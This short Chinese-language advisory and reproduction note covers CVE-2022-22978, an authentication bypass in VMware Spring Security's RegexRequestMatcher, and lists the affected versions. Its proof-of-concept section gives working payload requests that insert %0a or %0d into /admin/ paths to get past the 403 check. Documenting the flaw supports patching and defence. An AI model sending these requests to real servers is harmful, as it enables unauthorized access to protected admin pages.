VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978
漏洞描述
VMware Spring Security是美国威睿(VMware)公司的一套为基于Spring的应用程序提供说明性安全保护的安全框架。VMware Spring Security存在授权问题漏洞,该漏洞源于在应用程序中使用 RegexRequestMatcher 以及正则表达式的通配符(.)处理不受信任的输入时存在输入验证错误。
参考链接:
漏洞影响
Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4
Spring Security 其他低版本同样受影响漏洞复现
正常访问/admin/下任何路由均会提示403。
在/admin/下任何路由中,插入%0a或者%0d,即可绕过验证访问页面。
poc:
/admin/%0a%0d例如:
GET /admin/%0atest HTTP/1.1GET /admin/%0dtest HTTP/1.1GET /admin/%0a%0d%0dtest HTTP/1.1